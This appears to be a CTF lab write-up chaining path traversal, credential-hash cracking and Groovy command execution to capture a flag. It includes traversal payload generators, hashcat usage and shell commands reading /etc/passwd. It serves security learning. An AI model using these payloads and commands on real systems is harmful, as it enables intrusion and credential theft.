Path Traversal to RCE: Bug Bounty Write-Up POC
Introduction
Bug bounty hunting is all about persistence and creativity. This write-up documents my approach to a CTF lab that simulates a real-world vulnerability, inspired by this $40,000 bounty write-up by Abdullah Nawaf and Orwa Atyat. In this challenge, I exploited a path traversal vulnerability to escalate to remote code execution (RCE) on ev3spph9.eu2.ctfio.com.
Reconnaissance & Discovery
Target: ev3spph9.eu2.ctfio.com
Tools Used:
- nmap for port scanning: nmap -p- ev3spph9.eu2.ctfio.com
- ffuf for directory fuzzing: ffuf -u http://ev3spph9.eu2.ctfio.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
- gobuster for additional enumeration: gobuster dir -u https://ev3spph9.eu2.ctfio.com -w /usr/share/wordlists/dirb/common.txt
Output:
/admin (Status: 302) [Size: 0] [--> /admin/faces/jsf/login.xhtml]
I found an admin panel at http://ev3spph9.eu2.ctfio.com/admin/faces/jsf/login.xhtml and a /download/ endpoint that hinted at file retrieval functionality.
Exploiting Path Traversal
Fuzzing the /admin/download endpoint revealed the vulnerable filename parameter (note that wfuzz's --hh hides responses by character count, while --hc hides them by HTTP status code):
wfuzz -c -z file,/usr/share/wordlists/common.txt --hh=404 "http://ev3spph9.eu2.ctfio.com/admin/download?filename=FUZZ"
This allowed me to read files like /WEB-INF/web.xml, revealing internal endpoints.
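The probing and the server-side mistake behind it, as an added example that is not code from the original write-up. It generates the traversal payloads a tester would send to a download endpoint like /admin/download?filename=..., climbing one directory at a time with several separator encodings, and runs them against a small in-memory stand-in for the lab host with two resolvers side by side: the naive join-and-normalise that lets "../" (and an absolute path) escape, and a hardened version that rejects anything resolving outside the web root. The web root, the fake filesystem, the response codes and the host name in the usage line are assumptions.

```python
"""
Added example, not code from the original write-up: probe a download endpoint
such as /admin/download?filename=... for path traversal, and show the
server-side resolution that makes it vulnerable beside one that rejects it.
The web root, the fake filesystem and the response codes are assumptions.
"""
import posixpath
from urllib.parse import quote

# Separator encodings to try when a plain "../" is filtered or normalised away.
ENCODINGS = {
    "plain": "../",
    "url": "..%2f",             # works only if the server decodes after its check
    "double_url": "..%252f",    # for servers that decode twice
    "backslash": "..\\",        # Windows-style separator
    "nested": "....//",         # survives a single-pass strip of "../"
}

# Constructed stand-in for the lab host's filesystem (assumed layout).
WEB_ROOT = "/opt/app/webapp/admin/download"
FAKE_FS = {
    WEB_ROOT + "/report.pdf": "%PDF-1.4",
    "/opt/app/WEB-INF/web.xml": "<web-app><servlet-mapping>...</servlet-mapping></web-app>",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash",
}


def build_payloads(target, depth):
    """Yield (label, filename value) pairs that climb `depth` levels towards `target`."""
    target = target.lstrip("/")
    for label, sep in ENCODINGS.items():
        yield label, sep * depth + target


def to_url(base_url, payload):
    """Request URL for a payload; '/' and '%' are kept so pre-encoded payloads survive."""
    return f"{base_url}?filename={quote(payload, safe='/%')}"


def naive_resolve(webroot, filename):
    """Vulnerable: join and normalise, so '../' climbs out and an absolute path replaces the root."""
    return posixpath.normpath(posixpath.join(webroot, filename))


def safe_resolve(webroot, filename):
    """Hardened: no encoded or backslash separators, no absolute paths, and the final path must stay under webroot."""
    if "%" in filename or "\\" in filename or filename.startswith("/"):
        return None
    full = posixpath.normpath(posixpath.join(webroot, filename))
    if full != webroot and not full.startswith(webroot + "/"):
        return None
    return full


def fetch(resolver, filename):
    """Simulate GET /admin/download?filename=<filename> against FAKE_FS."""
    path = resolver(WEB_ROOT, filename)
    if path is None:
        return 403, ""
    return (200, FAKE_FS[path]) if path in FAKE_FS else (404, "")


def probe(resolver, target, max_depth=6):
    """Try every encoding at increasing depth; return (label, depth, payload, body) on the first hit."""
    for depth in range(1, max_depth + 1):
        for label, payload in build_payloads(target, depth):
            status, body = fetch(resolver, payload)
            if status == 200:
                return label, depth, payload, body
    return None


if __name__ == "__main__":
    hit = probe(naive_resolve, "/WEB-INF/web.xml")
    print("vulnerable server:", hit and to_url("http://ev3spph9.eu2.ctfio.com/admin/download", hit[2]))
    print("hardened server:", probe(safe_resolve, "/WEB-INF/web.xml"))
```

Against a live target, swap `fetch` for a real HTTP request built with `to_url` and keep the depth loop: the number of "../" needed tells you how deep the download directory sits under the application root, which is exactly the information that lets you reach WEB-INF/web.xml next.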
Credential Discovery & Admin Access
A log file at /admin/incident-report contained hashed credentials. Extracting and cracking them:
curl -o incident-report.zip http://ev3spph9.eu2.ctfio.com/admin/incident-report
unzip incident-report.zip
cat incident.log
Extracted hashes were cracked using hashcat and Crackstation:
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
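The extract-and-crack step above, as an added example that is not code from the original write-up: it pulls credential hashes out of a leaked log, picks the hashcat mode from the digest length, and runs a straight (-a 0) wordlist attack, which is what `hashcat -m 0 -a 0 hash.txt rockyou.txt` does for MD5. The log format, user names, passwords and the mini wordlist are all constructed for the example; the lab's real incident.log layout is not shown on this page.

```python
"""
Added example, not code from the original write-up: extract credential hashes
from a leaked incident log and run a straight wordlist attack against them,
the same thing `hashcat -m 0 -a 0 hash.txt rockyou.txt` does for MD5.
The log format, user names, passwords and wordlist are all constructed here.
"""
import hashlib
import re

# Constructed incident.log sample; the lab's real format is not known.
SAMPLE_LOG = "\n".join([
    "2025-02-28 10:41:03 WARN  auth   login failed user=admin hash="
    + hashlib.md5(b"letmein").hexdigest(),
    "2025-02-28 10:41:09 INFO  auth   password reset user=backup hash="
    + hashlib.md5(b"not-in-any-wordlist-9f3").hexdigest(),
    "2025-02-28 10:42:11 ERROR export step2 failed: java.io.IOException",
])

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "admin", "letmein", "qwerty"]

HASH_RE = re.compile(r"user=(?P<user>\w+)\s+hash=(?P<hash>[0-9a-fA-F]{32,64})\b")

# hashcat -m values for unsalted hex digests that can be told apart by length.
MODE_BY_LENGTH = {32: 0, 40: 100, 64: 1400}   # MD5, SHA-1, SHA-256


def extract_hashes(log_text):
    """Map user -> hash for every log line that carries a credential hash."""
    return {m.group("user"): m.group("hash").lower() for m in HASH_RE.finditer(log_text)}


def guess_hashcat_mode(digest):
    """Pick the hashcat mode by digest length; None if the length matches none of the above."""
    return MODE_BY_LENGTH.get(len(digest))


def crack(hashes, wordlist, algorithm="md5"):
    """Straight (-a 0) attack: hash each candidate once and look it up against every target."""
    targets = {h.lower() for h in hashes}
    found = {}
    for word in wordlist:
        digest = hashlib.new(algorithm, word.encode()).hexdigest()
        if digest in targets:
            found[digest] = word
            if len(found) == len(targets):
                break
    return found


if __name__ == "__main__":
    creds = extract_hashes(SAMPLE_LOG)
    print("hashcat mode:", guess_hashcat_mode(creds["admin"]))
    cracked = crack(creds.values(), WORDLIST)
    for user, digest in creds.items():
        print(f"{user}: {cracked.get(digest, '<not cracked>')}")
```

A 32-character hex digest is ambiguous (MD5 and NTLM look identical), so if mode 0 yields nothing on a Windows-flavoured target, mode 1000 is the next thing to try; the lookup-by-set design is what keeps a straight attack cheap no matter how many hashes the log contains.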
Logging in as admin at /admin/faces/jsf/login.xhtml provided access to a script execution console (export_step2.xhtml).
Achieving RCE
The console accepted Groovy, where "cmd".execute().text runs a shell command and returns its output, so it allowed executing system commands:
I tried these:
println "id".execute().text
println "cat /flag.txt".execute().text
print "id".execute().text
print "cat /etc/passwd".execute().text
return ["id".execute().text, "cat /flag.txt".execute().text]
Since output wasn't directly displayed, I checked logs:
curl -o incident-report.zip http://ev3spph9.eu2.ctfio.com:8443/admin/incident-report
unzip incident-report.zip
cat incident.log
Executing:
print "cat /flag.txt".execute().text
Successfully retrieved the flag!
Key Takeaways
- Chaining bugs—a small vulnerability can lead to full compromise.
- Check logs for output when commands don’t return results.
- Persistence wins—keep testing different angles.
Conclusion
By combining multiple issues, I escalated from path traversal to RCE. This lab reinforced the importance of exploring beyond the initial vulnerability for maximum impact.
Filed under: Ethical Hacking - @ March 1, 2025 1:15 am